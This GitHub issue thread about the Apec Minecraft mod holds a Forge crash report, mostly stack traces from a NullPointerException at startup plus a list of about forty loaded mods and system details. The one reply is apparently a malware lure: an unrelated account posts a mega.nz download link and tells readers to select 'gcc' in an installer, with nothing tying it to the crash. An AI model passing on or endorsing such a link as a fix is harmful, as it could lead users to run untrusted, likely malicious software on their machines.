### ISSUE TITLE
Game creashes

### ISSUE THREAD

**Issue by Vovkey** [BananaFructa/Apec#46]
---- Minecraft Crash Report ----
***Skytils detected Mixins in this crash***
Mixin registrant mixin.crashpatch.json, class org.polyfrost.crashpatch.mixin.MixinMinecraft, transformed net.minecraft.client.Minecraft.handler$cio000$run

WARNING: coremods are present:
  FMLLoadingPlugin (TNT Time-1.1 (1.8.9).jar)
  FMLLoadingPlugin (Scrollable Tooltips-1.4 (1.8.9).jar)
  Skytils On Top (Skytils-1.10.3.jar)
  AsmHelperLoadingPlugin (ctjs-2.2.1-1.8.9.jar)
  ModDetectorPlugin (OverflowAnimations-1.8.9-forge-2.2.5.jar)
  PatcherTweaker (PolyPatcher-1.8.9-forge-1.10.1.jar)
  ModTweaker (PolyPatcher-1.8.9-forge-1.10.1.jar)
Contact their authors BEFORE contacting forge

// My bad.

Time: 8/25/24 12:23 PM
Description: Initializing game

java.lang.NullPointerException: Initializing game
	at Apec.Utils.ApecUtils.showMessage(ApecUtils.java:156)
	at Apec.Settings.SettingsManager.LoadSettings(SettingsManager.java:227)
	at Apec.ApecMain.init(ApecMain.java:122)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:497)
	at net.minecraftforge.fml.common.FMLModContainer.handleModStateEvent(FMLModContainer.java:560)
	at sun.reflect.GeneratedMethodAccessor11.invoke(Unknown Source)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:497)
	at com.google.common.eventbus.EventSubscriber.handleEvent(EventSubscriber.java:74)
	at com.google.common.eventbus.SynchronizedEventSubscriber.handleEvent(SynchronizedEventSubscriber.java:47)
	at com.google.common.eventbus.EventBus.dispatch(EventBus.java:322)
	at com.google.common.eventbus.EventBus.dispatchQueuedEvents(EventBus.java:304)
	at com.google.common.eventbus.EventBus.post(EventBus.java:275)
	at net.minecraftforge.fml.common.LoadController.sendEventToModContainer(LoadController.java:211)
	at net.minecraftforge.fml.common.LoadController.propogateStateMessage(LoadController.java:189)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:497)
	at com.google.common.eventbus.EventSubscriber.handleEvent(EventSubscriber.java:74)
	at com.google.common.eventbus.SynchronizedEventSubscriber.handleEvent(SynchronizedEventSubscriber.java:47)
	at com.google.common.eventbus.EventBus.dispatch(EventBus.java:322)
	at com.google.common.eventbus.EventBus.dispatchQueuedEvents(EventBus.java:304)
	at com.google.common.eventbus.EventBus.post(EventBus.java:275)
	at net.minecraftforge.fml.common.LoadController.distributeStateMessage(LoadController.java:118)
	at net.minecraftforge.fml.common.Loader.initializeMods(Loader.java:737)
	at net.minecraftforge.fml.client.FMLClientHandler.finishMinecraftLoading(FMLClientHandler.java:310)
	at net.minecraft.client.Minecraft.startGame(Minecraft.java:495)
	at net.minecraft.client.Minecraft.handler$cio000$run(Minecraft.java:3239)
	at net.minecraft.client.Minecraft.run(Minecraft.java)
	at net.minecraft.client.main.Main.main(SourceFile:124)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:497)
	at net.minecraft.launchwrapper.Launch.launch(Launch.java:135)
	at net.minecraft.launchwrapper.Launch.main(Launch.java:28)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:497)
	at gg.essential.loader.stage2.relaunch.Relaunch.relaunch(Relaunch.java:124)
	at gg.essential.loader.stage2.EssentialLoader.preloadEssential(EssentialLoader.java:220)
	at gg.essential.loader.stage2.EssentialLoader.loadPlatform(EssentialLoader.java:116)
	at gg.essential.loader.stage2.EssentialLoaderBase.load(EssentialLoaderBase.java:148)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:497)
	at gg.essential.loader.stage1.EssentialLoaderBase.load(EssentialLoaderBase.java:293)
	at gg.essential.loader.stage1.EssentialSetupTweaker.<init>(EssentialSetupTweaker.java:44)
	at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
	at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
	at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
	at java.lang.reflect.Constructor.newInstance(Constructor.java:422)
	at gg.essential.loader.stage0.EssentialSetupTweaker.loadStage1(EssentialSetupTweaker.java:53)
	at gg.essential.loader.stage0.EssentialSetupTweaker.<init>(EssentialSetupTweaker.java:26)
	at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
	at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
	at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
	at java.lang.reflect.Constructor.newInstance(Constructor.java:422)
	at java.lang.Class.newInstance(Class.java:442)
	at net.minecraft.launchwrapper.Launch.launch(Launch.java:98)
	at net.minecraft.launchwrapper.Launch.main(Launch.java:28)

A detailed walkthrough of the error, its code path and all known details is as follows:
---------------------------------------------------------------------------------------

-- Head --
Stacktrace:
	at Apec.Utils.ApecUtils.showMessage(ApecUtils.java:156)
	at Apec.Settings.SettingsManager.LoadSettings(SettingsManager.java:227)
	at Apec.ApecMain.init(ApecMain.java:122)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:497)
	at net.minecraftforge.fml.common.FMLModContainer.handleModStateEvent(FMLModContainer.java:560)
	at sun.reflect.GeneratedMethodAccessor11.invoke(Unknown Source)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:497)
	at com.google.common.eventbus.EventSubscriber.handleEvent(EventSubscriber.java:74)
	at com.google.common.eventbus.SynchronizedEventSubscriber.handleEvent(SynchronizedEventSubscriber.java:47)
	at com.google.common.eventbus.EventBus.dispatch(EventBus.java:322)
	at com.google.common.eventbus.EventBus.dispatchQueuedEvents(EventBus.java:304)
	at com.google.common.eventbus.EventBus.post(EventBus.java:275)
	at net.minecraftforge.fml.common.LoadController.sendEventToModContainer(LoadController.java:211)
	at net.minecraftforge.fml.common.LoadController.propogateStateMessage(LoadController.java:189)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:497)
	at com.google.common.eventbus.EventSubscriber.handleEvent(EventSubscriber.java:74)
	at com.google.common.eventbus.SynchronizedEventSubscriber.handleEvent(SynchronizedEventSubscriber.java:47)
	at com.google.common.eventbus.EventBus.dispatch(EventBus.java:322)
	at com.google.common.eventbus.EventBus.dispatchQueuedEvents(EventBus.java:304)
	at com.google.common.eventbus.EventBus.post(EventBus.java:275)
	at net.minecraftforge.fml.common.LoadController.distributeStateMessage(LoadController.java:118)
	at net.minecraftforge.fml.common.Loader.initializeMods(Loader.java:737)
	at net.minecraftforge.fml.client.FMLClientHandler.finishMinecraftLoading(FMLClientHandler.java:310)
	at net.minecraft.client.Minecraft.startGame(Minecraft.java:495)

-- Initialization --
Details:
Stacktrace:
	at net.minecraft.client.Minecraft.handler$cio000$run(Minecraft.java:3239)
	at net.minecraft.client.Minecraft.run(Minecraft.java)
	at net.minecraft.client.main.Main.main(SourceFile:124)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:497)
	at net.minecraft.launchwrapper.Launch.launch(Launch.java:135)
	at net.minecraft.launchwrapper.Launch.main(Launch.java:28)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:497)
	at gg.essential.loader.stage2.relaunch.Relaunch.relaunch(Relaunch.java:124)
	at gg.essential.loader.stage2.EssentialLoader.preloadEssential(EssentialLoader.java:220)
	at gg.essential.loader.stage2.EssentialLoader.loadPlatform(EssentialLoader.java:116)
	at gg.essential.loader.stage2.EssentialLoaderBase.load(EssentialLoaderBase.java:148)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:497)
	at gg.essential.loader.stage1.EssentialLoaderBase.load(EssentialLoaderBase.java:293)
	at gg.essential.loader.stage1.EssentialSetupTweaker.<init>(EssentialSetupTweaker.java:44)
	at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
	at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
	at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
	at java.lang.reflect.Constructor.newInstance(Constructor.java:422)
	at gg.essential.loader.stage0.EssentialSetupTweaker.loadStage1(EssentialSetupTweaker.java:53)
	at gg.essential.loader.stage0.EssentialSetupTweaker.<init>(EssentialSetupTweaker.java:26)
	at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
	at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
	at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
	at java.lang.reflect.Constructor.newInstance(Constructor.java:422)
	at java.lang.Class.newInstance(Class.java:442)
	at net.minecraft.launchwrapper.Launch.launch(Launch.java:98)
	at net.minecraft.launchwrapper.Launch.main(Launch.java:28)

-- System Details --
Details:
	Game Directory: C:\Users\dgmau\AppData\Roaming\.minecraft\skyclient
	ChatTriggers modules: [Module{name=axios,version=1.0.9}, Module{name=AzuredClient,version=1.6.5}, Module{name=BeaconBeam,version=1.0.1}, Module{name=BetterMap,version=1.0.18}, Module{name=BetterMaps,version=0.0.1}, Module{name=Bloom,version=4.8.4}, Module{name=BloomCore,version=0.4.15}, Module{name=DragPrio,version=1.1.2}, Module{name=FontLib,version=1.0.0}, Module{name=guimanager,version=0.1.7}, Module{name=NwjnAddons,version=0.11.5}, Module{name=PogData,version=1.0.3}, Module{name=PromiseV2,version=1.0.4}, Module{name=RenderLib,version=0.4.0}, Module{name=requestV2,version=2.1.1}, Module{name=soopyAddonsData,version=0.0.1}, Module{name=soopyApis,version=0.1.17}, Module{name=SoopyV2,version=2.1.202}, Module{name=Vigilance,version=1.3.2}]
	Minecraft Version: 1.8.9
	Operating System: Windows 10 (amd64) version 10.0
	Java Version: 1.8.0_51, Oracle Corporation
	Java VM Version: Java HotSpot(TM) 64-Bit Server VM (mixed mode), Oracle Corporation
	Memory: 162628416 bytes (155 MB) / 1174405120 bytes (1120 MB) up to 3221225472 bytes (3072 MB)
	JVM Flags: 8 total; -XX:HeapDumpPath=MojangTricksIntelDriversForPerformance_javaw.exe_minecraft.exe.heapdump -Xmx3G -XX:+UnlockExperimentalVMOptions -XX:+UseG1GC -XX:G1NewSizePercent=20 -XX:G1ReservePercent=20 -XX:MaxGCPauseMillis=50 -XX:G1HeapRegionSize=32M
	IntCache: cache: 0, tcache: 0, allocated: 0, tallocated: 0
	FML: MCP 9.19 Powered by Forge 11.15.1.2318 Optifine OptiFine_1.8.9_HD_U_M6_pre2 41 mods loaded, 41 mods active
	States: 'U' = Unloaded 'L' = Loaded 'C' = Constructed 'H' = Pre-initialized 'I' = Initialized 'J' = Post-initialized 'A' = Available 'D' = Disabled 'E' = Errored

	| State | ID                          | Version        | Source                                   |
	| ----- | --------------------------- | -------------- | ---------------------------------------- |
	| UCHI  | mcp                         | 9.19           | minecraft.jar                            |
	| UCHI  | FML                         | 8.0.99.99      | forge-1.8.9-11.15.1.2318-1.8.9.jar       |
	| UCHI  | Forge                       | 11.15.1.2318   | forge-1.8.9-11.15.1.2318-1.8.9.jar       |
	| UCHI  | polypatcher                 | 1.10.1         | minecraft.jar                            |
	| UCHI  | essential                   | 1.0.0          | Essential (forge_1.8.9).processed.jar    |
	| UCHI  | oneconfig                   | 0.2.2-alpha213 | OneConfig (1.8.9-forge).jar              |
	| UCHI  | hypixel_mod_api             | 1.0.1.1        | HypixelModAPI-1.0.1.1.jar                |
	| UCHE  | apec                        | 1.12.1         | Apec-1.8.9-forge-1.12.1.jar              |
	| UCHI  | autotip                     | 3.1            | Autotip-3.1.1 (1.8.9_forge).jar          |
	| UCHI  | behindyouv3                 | 3.2.2          | BehindYouV3-1.8.9-forge-3.2.2.jar        |
	| UCHI  | chatting                    | 2.0.6          | Chatting-1.8.9-forge-2.0.6.jar           |
	| UCHI  | craftify                    | 1.15.0         | Craftify-1.8.9-1.15.0-forge.jar          |
	| UCHI  | crashpatch                  | 2.0.1          | CrashPatch-1.8.9-forge-2.0.1.jar         |
	| UCHI  | chattriggers                | 2.2.1          | ctjs-2.2.1-1.8.9.jar                     |
	| UCHI  | damagetint                  | 3.3.0          | DamageTint-1.8.9-forge-3.3.0.jar         |
	| UCHI  | dungeonrooms                | 3.4.1          | Dungeon_Rooms-3.4.1.jar                  |
	| UCHI  | hypixel_auto_complete       | 1.1.0          | Hypixel Autocomplete-1.1 (1.8.9).jar     |
	| UCHI  | hytils-reborn               | 1.7.3          | Hytils Reborn-1.8.9-forge-1.7.3.jar      |
	| UCHI  | insomnia                    | 1.0-REL        | Insomnia-1.0-REL.jar                     |
	| UCHI  | level_head                  | 8.2.2          | LevelHead-8.2.2 (1.8.9).jar              |
	| UCHI  | mixmetica                   | 2.1.0          | Mixmetica-1.8.9-forge-2.1.0.jar          |
	| UCHI  | notenoughupdates            | 2.3.3          | NotEnoughUpdates-2.3.3.jar               |
	| UCHI  | od                          | 1.2.4.1        | odin-1.2.4.1.jar                         |
	| UCHI  | optibye                     | 1.0.0          | Optibye-1.0.0-dep.jar                    |
	| UCHI  | overflowanimations          | 2.2.5          | OverflowAnimations-1.8.9-forge-2.2.5.jar |
	| UCHI  | overflowparticles           | 1.0.2          | OverflowParticles-1.8.9-forge-1.0.2.jar  |
	| UCHI  | polynametag                 | 1.0.7          | PolyNametag-1.8.9-forge-1.0.7.jar        |
	| UCHI  | patcher                     | 1.10.1         | PolyPatcher-1.8.9-forge-1.10.1.jar       |
	| UCHI  | polysprint                  | 1.0.1          | PolySprint-1.8.9-forge-1.0.1.jar         |
	| UCHI  | popup_events                | 1.3.2          | Popup Events-1.3.2 (1.8.9).jar           |
	| UCHI  | gravyrewardclaim            | 1.0.4          | RewardClaim-1.0.6.jar                    |
	| UCHI  | text_overflow_scroll        | 1.4.0          | Scrollable Tooltips-1.4 (1.8.9).jar      |
	| UCHI  | SkyblockExtras              | 2.2.0-pre24    | SkyblockExtras-2.2.0-pre24.jar           |
	| UCHI  | skyblockclientupdater       | @VER           | SkyClient-Updater-1.8.9-forge-1.3.10.jar |
	| UCHI  | skyclientcosmetics          | 1.2.2          | SkyClientCosmetics-1.8.9-forge-1.2.2.jar |
	| UCHI  | skyhanni                    | 0.26           | SkyHanni-0.26.jar                        |
	| UCHI  | skytils                     | 1.10.3         | Skytils-1.10.3.jar                       |
	| UCHI  | smooth-scrolling-everywhere | 1.2            | smooth-scrolling-everywhere-1.2.jar      |
	| UCHI  | soopyv2forge                | 1.1            | soopyv2forge-1.1 (1).jar                 |
	| UCHI  | tnttime                     | 1.1.0          | TNT Time-1.1 (1.8.9).jar                 |
	| UCHI  | vanillahud                  | 2.2.10         | VanillaHUD-1.8.9-forge-2.2.10.jar        |

	Loaded coremods (and transformers): 
FMLLoadingPlugin (TNT Time-1.1 (1.8.9).jar)
  club.sk1er.mods.tnttimer.forge.ClassTransformer
FMLLoadingPlugin (Scrollable Tooltips-1.4 (1.8.9).jar)
  club.sk1er.mods.scrollabletooltips.forge.ClassTransformer
Skytils On Top (Skytils-1.10.3.jar)
  gg.skytils.skytilsmod.asm.SkytilsTransformer
AsmHelperLoadingPlugin (ctjs-2.2.1-1.8.9.jar)
  com.chattriggers.ctjs.launch.plugin.CTJSTransformer
ModDetectorPlugin (OverflowAnimations-1.8.9-forge-2.2.5.jar)
  
PatcherTweaker (PolyPatcher-1.8.9-forge-1.10.1.jar)
  club.sk1er.patcher.tweaker.ClassTransformer
ModTweaker (PolyPatcher-1.8.9-forge-1.10.1.jar)
  club.sk1er.patcher.tweaker.other.ModClassTransformer
	GL info: ' Vendor: 'NVIDIA Corporation' Version: '4.6.0 NVIDIA 537.13' Renderer: 'NVIDIA GeForce RTX 2060/PCIe/SSE2'
	Skytils Debug Info: {HasBetterFPS=false, BetterFPS Version=NONE, Disabled Start Checks=false}
	Launched Version: 1.8.9-forge1.8.9-11.15.1.2318-1.8.9
	LWJGL: 2.9.4
	OpenGL: NVIDIA GeForce RTX 2060/PCIe/SSE2 GL version 4.6.0 NVIDIA 537.13, NVIDIA Corporation
	GL Caps: Using GL 1.3 multitexturing.
Using GL 1.3 texture combiners.
Using framebuffer objects because OpenGL 3.0 is supported and separate blending is supported.
Shaders are available because OpenGL 2.1 is supported.
VBOs are available because OpenGL 1.5 is supported.

	Using VBOs: No
	Is Modded: Definitely; Client brand changed to 'fml,forge'
	Type: Client (map_client.txt)
	Resource Packs: 1.14 Packport.zip, !     §3defrosted §8[§f16x§8].zip
	Current Language: English (US)
	Profiler Position: N/A (disabled)
	CPU: 16x AMD Ryzen 7 5700G with Radeon Graphics 
	OptiFine Version: OptiFine_1.8.9_HD_U_M6_pre2
	OptiFine Build: 20211101-204933
	Render Distance Chunks: 8
	Mipmaps: 4
	Anisotropic Filtering: 1
	Antialiasing: 0
	Multitexture: false
	Shaders: null
	OpenGlVersion: 4.6.0 NVIDIA 537.13
	OpenGlRenderer: NVIDIA GeForce RTX 2060/PCIe/SSE2
	OpenGlVendor: NVIDIA Corporation
	CpuCount: 16

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
